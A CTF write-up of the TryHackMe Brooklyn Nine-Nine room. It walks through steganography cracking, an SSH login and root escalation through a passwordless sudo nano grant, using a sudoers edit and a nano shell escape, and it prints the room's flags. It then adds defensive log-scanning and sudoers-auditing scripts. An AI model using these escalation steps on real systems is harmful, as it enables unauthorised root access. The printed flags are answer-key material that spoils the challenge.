TryHackMe - Brooklyn Nine-Nine CTF Write-up

This is a beginner-friendly CTF challenge themed around the Brooklyn Nine-Nine TV series. The objective is to find the user and root flags through enumeration, steganography, and privilege escalation.

Difficulty: Easy

Room Link: https://tryhackme.com/room/brooklynninenine

CTF

Leadhand

1/28/2026 · 2 min read

Reconnaissance

Initial Nmap Scan

First, we need to enumerate the target machine to identify open ports and running services:

nmap -sC -sV -oN nmap_initial.txt <TARGET_IP>

Expected open ports:

  • Port 21 - FTP (vsftpd)

  • Port 22 - SSH (OpenSSH)

  • Port 80 - HTTP (Apache)

Web Enumeration

Visiting the web server on port 80 reveals a Brooklyn Nine-Nine themed page with an image (brooklyn99.jpg).

Steganography Analysis

Extracting Hidden Data

The image file brooklyn99.jpg on the website contains hidden data. We can use stegseek to crack the steganography password using the rockyou wordlist:

stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt

Result: Stegseek successfully extracts a hidden file revealing SSH credentials.

Extract the Hidden File

Once we have the password from stegseek, we can extract the embedded data:

steghide extract -sf brooklyn99.jpg

This reveals a text file containing:

  • Username: holt

  • Password: [password found in extracted file]

Initial Access - SSH as Holt

Login via SSH

Using the credentials discovered from steganography:

ssh holt@<TARGET_IP>

Password: [extracted password]

User Flag

Once logged in as user holt, we can grab the user flag:

ls

cat user.txt

User Flag: ee11cbb19052e40b07aac0ca060c23ee

Privilege Escalation

Enumeration as Holt

Check bash history for interesting commands:

cat .bash_history

Findings:

  • su - jake - indicates another user named jake on the system

  • User attempted to switch to jake's account

Check Sudo Permissions

The most critical enumeration step - checking what sudo privileges the current user has:

sudo -l

Output:

User holt may run the following commands on brookly_nine_nine: (ALL) NOPASSWD: /bin/nano

Critical Finding: User holt can run /bin/nano as root without a password!

Root Exploitation

Method 1: Editing /etc/sudoers Directly

You can edit the sudoers file to grant yourself full sudo privileges:

sudo /bin/nano /etc/sudoers

Add or modify a line to give yourself full sudo access:

holt ALL=(ALL) NOPASSWD: ALL

Save and exit nano, then you can run any command as root. Note that nano does not perform the syntax check that visudo does, so a malformed sudoers line can break sudo for every user on the system.

Method 2: GTFOBins - Nano Shell Escape (Recommended)

A cleaner approach uses nano's built-in command execution feature:

  1. Open any file with sudo privileges:

sudo /bin/nano /etc/profile

  2. Inside nano, press the following key combination:

    • Ctrl + R (Read File)

    • Ctrl + X (Execute Command)

  3. Enter the command:

!/bin/sh

  4. Press Enter

Result: This spawns a root shell!
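Both methods leave a trace: sudo logs every command it runs (on Debian/Ubuntu hosts this lands in /var/log/auth.log via syslog by default), so a defender can catch this escalation chain from the log alone. The script below is an added example, not part of the original write-up or the room. It parses sudo's command records and flags an editor or pager executed as root (the shell-escape risk) and, at higher severity, any non-visudo command that touches /etc/sudoers. The log lines are constructed for the example; the hostname and the users holt and jake are taken from the write-up, the user "ops" is invented.

```python
import os
import re
from typing import Dict, List, Optional

# sudo's default command record in syslog/auth.log looks like:
#   sudo:     holt : TTY=pts/0 ; PWD=/home/holt ; USER=root ; COMMAND=/bin/nano /etc/sudoers
SUDO_CMD_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)

# Interactive programs with a documented shell escape (see the GTFOBins "sudo" entries).
ESCAPE_CAPABLE = {"nano", "pico", "vim", "vi", "view", "less", "more", "man", "ed"}

# Any write to the policy itself outside visudo (which syntax-checks) is the top finding.
SUDOERS_PATHS = ("/etc/sudoers", "/etc/sudoers.d/")

# Constructed sample log; hostname and the users holt/jake come from the write-up,
# "ops" is invented for the sample.
SAMPLE_AUTH_LOG = """\
Jan 28 10:14:50 brookly_nine_nine sudo:     holt : TTY=pts/0 ; PWD=/home/holt ; USER=root ; COMMAND=/bin/nano /etc/sudoers
Jan 28 10:14:50 brookly_nine_nine sudo: pam_unix(sudo:session): session opened for user root by holt(uid=0)
Jan 28 10:16:12 brookly_nine_nine sudo:     holt : TTY=pts/0 ; PWD=/home/holt ; USER=root ; COMMAND=/bin/nano /etc/profile
Jan 28 10:20:03 brookly_nine_nine sudo:      ops : TTY=pts/1 ; PWD=/home/ops ; USER=root ; COMMAND=/usr/bin/systemctl restart apache2
Jan 28 10:21:40 brookly_nine_nine sudo:     jake : TTY=pts/2 ; PWD=/home/jake ; USER=root ; COMMAND=/usr/sbin/visudo
"""


def analyze_sudo_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if it is benign or not a command record."""
    m = SUDO_CMD_RE.search(line.rstrip("\n"))
    if not m:
        return None  # session open/close, auth failures, other daemons
    argv = m.group("cmd").split()
    if not argv:
        return None
    binary = os.path.basename(argv[0])
    touches_policy = any(arg.startswith(SUDOERS_PATHS) for arg in argv[1:])
    if touches_policy and binary != "visudo":
        severity, reason = "high", "sudo policy modified outside visudo"
    elif binary in ESCAPE_CAPABLE and m.group("runas") == "root":
        severity, reason = "medium", f"{binary} run as root; shell escape available from inside it"
    else:
        return None
    return {
        "user": m.group("user"),
        "runas": m.group("runas"),
        "binary": binary,
        "command": m.group("cmd"),
        "severity": severity,
        "reason": reason,
    }


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Apply analyze_sudo_line to every line and keep the findings, in log order."""
    return [f for f in (analyze_sudo_line(ln) for ln in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_AUTH_LOG.splitlines()):
        print(f"[{finding['severity']}] {finding['user']} -> {finding['command']}: {finding['reason']}")
```

On the sample the script reports the /etc/sudoers edit as high and the nano session on /etc/profile as medium, while the systemctl restart and the visudo run produce nothing. Point it at a real auth.log with `scan(open("/var/log/auth.log").readlines())`; the medium rule fires on every editor run as root, which is exactly the sudo grant the Remediation section says not to give.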

Verify Root Access

whoami
# Output: root

id
# Output: uid=0(root) gid=0(root) groups=0(root)

Root Flag

Navigate to the root directory and capture the flag:

cd /root

ls

cat root.txt

Root Flag: 63a9f0ea7bb98050796b649e85481845

Summary

Attack Chain

  1. Reconnaissance - Identified HTTP service with an image file

  2. Steganography - Used stegseek to crack password-protected hidden data in brooklyn99.jpg

  3. Initial Access - Extracted SSH credentials for user holt

  4. Privilege Escalation - Exploited sudo permissions on /bin/nano to gain root shell

  5. Flags Captured - Retrieved both user and root flags

Key Techniques

  • Steganography analysis using stegseek/steghide

  • Sudo privilege enumeration with sudo -l

  • GTFOBins exploitation - nano shell escape

  • Alternative method - Direct sudoers file modification

Tools Used

  • stegseek - Steganography password cracking

  • steghide - Steganography extraction

  • ssh - Remote access

  • nano - Text editor (exploited for privesc)

  • GTFOBins reference for privilege escalation techniques

Lessons Learned

  1. Always check images and media files for steganography

  2. sudo -l should be one of the first enumeration steps after gaining initial access

  3. Many text editors and pagers (nano, vim, less, more) can be exploited for privilege escalation when run with sudo

  4. GTFOBins (https://gtfobins.github.io/) is an essential resource for Unix binary exploitation

Remediation

For Blue Team / Defenders:

  1. Steganography: Monitor and scan uploaded images for hidden data

  2. Sudo Privileges: Never grant sudo access to text editors or programs that allow command execution

  3. Principle of Least Privilege: Users should only have sudo access to specific commands they absolutely need

  4. Regular Audits: Review /etc/sudoers and sudo policies regularly
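Items 2 and 4 above are easy to automate. The script below is an added example, not part of the original write-up or the room: it parses a sudoers-style policy and flags the two patterns this room turns on, an ALL command set for a non-root principal and an editor or pager that can spawn a shell, noting NOPASSWD and lowering the severity when the grant carries sudo's NOEXEC tag. The suggested replacement uses sudoedit, which lets a user edit a specific file as root without ever running a root-owned editor process; the file path in that suggestion is a placeholder. The sudoers excerpt is constructed for the example (holt and jake are the write-up's users, the other lines are invented), and the parser handles single-line user specifications and the common tags only, not aliases or line continuations.

```python
import os
import re
from typing import List

# Interactive programs that can launch other commands from inside themselves (GTFOBins "sudo" entries).
SHELL_ESCAPE_BINARIES = {"nano", "pico", "vim", "vi", "view", "less", "more", "man", "ed", "emacs"}

# Simplified user specification: who host=(runas) [TAG:] command, [TAG:] command ...
USER_SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^([A-Z_]+):\s*")

SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")

# Constructed sudoers excerpt for the example; holt and jake are the write-up's users,
# the remaining lines are invented. The weak grant is the /bin/nano line, the
# corrected form of it is the sudoedit line.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
holt    ALL=(ALL) NOPASSWD: /bin/nano
jake    ALL=(root) /usr/bin/systemctl restart apache2, NOEXEC: /usr/bin/less /var/log/syslog
holt    ALL=(root) sudoedit /etc/profile
"""


def parse_user_specs(sudoers_text: str) -> List[dict]:
    """One entry per (who, command) pair; tags on a line carry over to the commands after them."""
    entries = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC_RE.match(line)
        if not m:
            continue
        tags = set()
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            while (t := TAG_RE.match(spec)):
                tag = t.group(1)
                # PASSWD cancels NOPASSWD, EXEC cancels NOEXEC, and vice versa
                tags.discard(tag[2:] if tag.startswith("NO") else "NO" + tag)
                tags.add(tag)
                spec = spec[t.end():]
            entries.append({
                "who": m.group("who"),
                "host": m.group("host"),
                "runas": m.group("runas") or "root",
                "tags": set(tags),
                "command": spec,
            })
    return entries


def audit(sudoers_text: str) -> List[dict]:
    """Flag unrestricted command sets and shell-escape-capable programs granted to non-root principals."""
    findings = []
    for e in parse_user_specs(sudoers_text):
        if e["who"] == "root" or not e["command"]:
            continue
        binary = os.path.basename(e["command"].split()[0])
        if e["command"] == "ALL":
            severity = "high"
            reason = "unrestricted command set"
            fix = "list the exact commands this principal needs"
        elif binary in SHELL_ESCAPE_BINARIES:
            # NOEXEC stops the program from exec'ing children on most Linux builds, which
            # blocks the escape but is no substitute for removing the grant
            severity = "medium" if "NOEXEC" in e["tags"] else "high"
            reason = f"{binary} can spawn a shell from inside itself"
            fix = f"{e['who']} ALL=(root) sudoedit /path/to/file  # placeholder path"
        else:
            continue
        if "NOPASSWD" in e["tags"]:
            reason += ", no password required"
        findings.append({"who": e["who"], "command": e["command"], "severity": severity, "reason": reason, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['who']}: {f['command']} -> {f['reason']}; fix: {f['fix']}")
```

On the sample this yields three findings: the %sudo group's ALL, holt's passwordless nano (the exact grant from this room), and jake's less, downgraded to medium because of NOEXEC. The sudoedit grant on the last line produces nothing, which is the point of recommending it. Run it on a live system with `audit(open("/etc/sudoers").read())` as root, and remember to feed it the files under /etc/sudoers.d/ as well.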

Challenge Completed! 🎉

This was a great beginner-level CTF that introduces fundamental concepts like steganography, SSH access, and sudo-based privilege escalation.